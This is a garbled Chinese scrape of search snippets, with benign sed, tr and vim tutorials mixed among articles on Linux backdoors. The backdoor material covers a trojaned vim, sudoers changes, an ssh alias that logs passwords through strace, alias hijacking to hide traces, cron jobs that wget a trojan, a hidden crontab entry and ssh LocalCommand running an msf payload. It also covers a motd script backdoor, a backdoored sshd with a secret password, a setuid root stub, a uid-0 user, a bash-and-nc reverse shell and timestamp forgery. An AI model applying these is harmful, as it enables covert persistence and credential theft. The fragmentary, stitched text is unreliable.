/bin/bash # Description: 替换rm命令,不是删除文件,而是移动文件到/tmp/trash_tmp/ TMP_DIR="/tmp/trash_tmp" mv $@ $TMP_DIR
Shell脚本中最有用的特性之一就是可以从命令输出中提取信息,并将其赋给变量。有两种方法可以将命令输出赋值给变量。 反引号字符(`) 反引号字符位于键盘上ESC键的下面。...赋值给变量的形式如下: test=`date` # demo $ test=`date` $ echo $test 2017年 1月11日 星期三 21时26分04秒 CST 两个反引号字符之间是shell命令...,shell命令的执行结果赋值给test,注意=两边不能有空格。
的环境变量,当然 vim 也是可以使用 Linux 环境变量的 通过在vim的底线命令模式中 echo $变量名 来获取 vim 的配置文件地址 因此,在 Ubuntu Server...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法...+vreplace: 启用替换模式功能。 +wildignore: 启用文件名忽略功能。 +wildmenu: 启用命令行补全菜单功能。 +windows: 启用多窗口支持。
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server..., ALL 表示所有命令 所以默认的配置的含义为 root 可以在任意主机上 sudo 获取任意用户和用户组的权限,并执行任意命令,需要输入密码 admin 用户组的用户可以在任意主机上 sudo 获取任意用户的权限...,并执行任意命令,需要输入密码 sudo 用户组的用户可以在任意主机上 sudo 获取任意用户以及用户组的权限,并执行任意命令,需要输入密码 现在我们了解了配置语法,现在我们看最后一行 @includedir...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...只是做了一个小技巧,而不是主要的后门命令,含义也就是将当前用户的ssh命令修改为 strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,...可以看到,设置别名后,我们执行test94 的时候会执行 cat /etc/issue ,这个时候我们就可以知道了,我们可以通过别名的方式劫持默认的命令,比如ls,而且不需要替换原文件。...劫持成功 此时 ls 还是原来正常的ls ,此时我们设置别名 alias ls="/usr/local/games/ls" 可以看到,现在状态 ls 命令已经被替换为了 echo "test94" ,这里我们还没有设置别名
知道这些“秘密”代码意味着你可以使用 sed 这样的命令以编程方式替换它们。任何版本的 sed 都可以,所以你可以使用 GNU sed 或 BSD sed,甚至是 Busybox sed。.../\"/g" "${1}" 将此脚本保存为 fixquotes.sh,然后创建一个包含智能引号的单独测试文件: ‘Single quote’“Double quote” 运行该脚本,然后使用 cat 命令查看结果.../fixquotes.sh test.txt$ cat test.txt'Single quote'"Double quote" 安装 sed 如果你使用的是 Linux、BSD 或 macOS,那么你已经安装了...这是原始 sed 命令的两个独特的重新实现,对于本文中的脚本来说,它们在功能上是一样的(不过并不是所有的脚本都是这样)。
ssh 客户端配置文件加载顺序 命令行参数 > ~/.ssh/config > /etc/ssh/ssh_config Ubuntu server 16.04 默认 /etc/ssh/ssh_config...config file syntax and how-tos for configuring the OpenSSH client LocalCommand 参数含义:当连接远程主机成功后,在本地计算机执行的命令...设置~/.ssh/config 中Host为*处设置 LocalCommand 参数为我们的msf恶意命令,同时设置 PermitLocalCommand 的值为 yes,并保存 ?...LocalCommand参数可用 ProxyCommand 连接主机过程中设置代理所使用的命令 重复过程不再赘述,仅写标题 msf设置监听 创建 ~/.ssh/config 如果.ssh目录不存在就创建这个目录
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...默认情况下Ubuntu 16.04 中 cron 服务是默认开机自启的 这个服务的使用也是比较简单,cron服务都是使用crontab 命令来进行设定计划任务的 ? 关于这个命令的一些参数如下: ?...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...改变展示系统时间戳的应用以及属性 一般大家都用 stat 来查看文件的完整时间戳,修改 stat 命令来改变展示的 ctime 不是一件难事 但是,可以获取文件 ctime 的应用不止 stat 一款,...系统时间修改 可以使用 date 命令或 timedatectl 来进行,需要 root权限,这里以 date 为例 date -s "时间字符串" 将系统时间设置为 2018年8月9日 10:11:12...文件创建时间 Ubuntu Server 22.10 以及 Centos Stream 9 都有文件创建时间这个概念了 文件创建时间目前 touch 命令也不支持直接修改,也没有找到其他工具可以改
查看原命令设置后门后显示什么样 alias 劫持一下显示,让设置后的显示与设置前一致 千万记得先去看一下是否系统默认或者管理员设置过这个命令的别名,参照之前的 ls 劫持 alias ,让 alias...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...设置后门后是这样的 ? set 命令返回的结果巨长,所以我是直接 grep 了一下 ?...whoami 命令和 pwd 命令都调用了 puts 函数,使用 ltrace 进行查看的时候还都实际调用执行了,但是 pwd 不会触发 payload 设置好后门后使用 ltrace 追踪 whoami
要替换字符串,我们需要使用以下格式。 $ sed s/替换的目标字符串/替换后的字符串/ 文件名 在下面我们替换写为“appleorangemelon”的字符串“sample.txt”。...另外,如下所示,在cat命令后用“|”连接sed命令也能得到同样的结果。...$ cat sample.txt | sed s/apple/APPLE/ 注意,sed命令仅替换字符串并输出它,但不会重写实际文件的内容 如果要将替换的内容保存在文本中,请使用重定向“>”。...sed命令使用的选项 命令选项 说明 -e 替换为指定的脚本 -f 文件 添加指定文件中描述的脚本文件的内容 -r 使用扩展正则表达式 sed命令的使用 替换所有行 在先前介绍的格式中,即使在一个行中存在与多个替换对象字符串匹配的字符串...,也仅替换第一个匹配的字符串。
,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...剩下几行就是生成一个临时文件,mktemp 用于生成一个临时文件 trap 用于捕捉某种信号,之后做一些操作,具体可以参照下面这篇文章 trap 命令,Linux trap 命令详解:捕捉信号和其他事件并执行命令...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...从代码中我们可以看到,这里执行了 grep、if、 /bin/date、/usr/bin/landscape-sysinfo /bin/date 是一个二进制文件,我们这里先不直接搞二进制(当然你可以搞),不然就和命令替换没什么区别了
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
和 Python 在做反弹shell基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我不太懂 perl ,这里就直接上反弹shell的命令了...telnet 反弹shell的方式和 nc 是一样的,在这里不过多描述了 ---- 在这里再添加一点之前遗漏的小东西 0x03 mknod [+] 之前创建命名管道都是用 mkfifo ,今天我发现了一个命令...mknod ,这个命令是用来创建一个文件块,可以用来创建设备,包括以下设备: 块设备(b) 字符设备 (c) 没有缓冲的字符设备 (u) fifo设备(p) 之前我们创建一个命名管道是 mkfifo
tr 将字符进行替换压缩和删除 补充说明 tr命令可以对来自标准输入的字符进行替换、压缩和删除。它可以将一组字符变成另一组字符,经常用来编写优美的单行命令,作用很强大。
sed -i "s/李三/李四/g" -r result/* 将result文件夹下的所有文件中的李三替换成李四 sed命令下批量替换文件内容 格式: sed -i "s/查找字段/...替换字段/g" `grep 查找字段 -rl 路径` 文件名 -i 表示inplace edit,就地修改文件 -r 表示搜索子目录 -l 表示输出匹配的文件名 s表示替换,d表示删除 示例:sed...-i "s/shan/hua/g" lishan.txt 把当前目录下lishan.txt里的shan都替换为hua
M 问题描述:对于换行,window下用回车换行(0A0D)来表示,linux下是回车(0A)来表示。...使用命令:cat filename1 | tr -d “VM” > newfile; 使用命令:sed -e “s/VM//” filename > outputfilename 需要注意的是在1、2两种方法中...在vi中处理:首先使用vi打开文件,然后按ESC键,接着输入命令: :%s/VM// :%s/^M$//g 如果上述方法无用,则正确的解决办法是: tr -d “\r” dest tr...-d “\015″ dest strings A>B 其它用法 利用 :s 命令可以实现字符串的替换。.../s//str2/g 功能同上 从上述替换命令可以看到:g 放在命令末尾,表示对搜索字符串的每次出现进行替换;不加 g,表示只对搜索字符串的首次出现进行替换;g 放在命令开头,表示对正文中所有包含搜索字符串的行进行替换操作
UnixBash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。...nc -vv -lp 53 Linux/Unix 藏文件和文件夹 Linux/Unix 下想藏 Webshell 或者后门什么的,可以利用一下隐藏文件夹和文件。 方法一 比如创建一个名字开头带 ....利用方法 useradd -o -u 0 backdoor Linux/Unix 修改文件时间戳 简介 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用touch就可以了。...快速获得ssh后门 简介 执行命令就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。...劣势:会替换ls等命令,容易被识破
领取专属 10元无门槛券
手把手带您无忧上云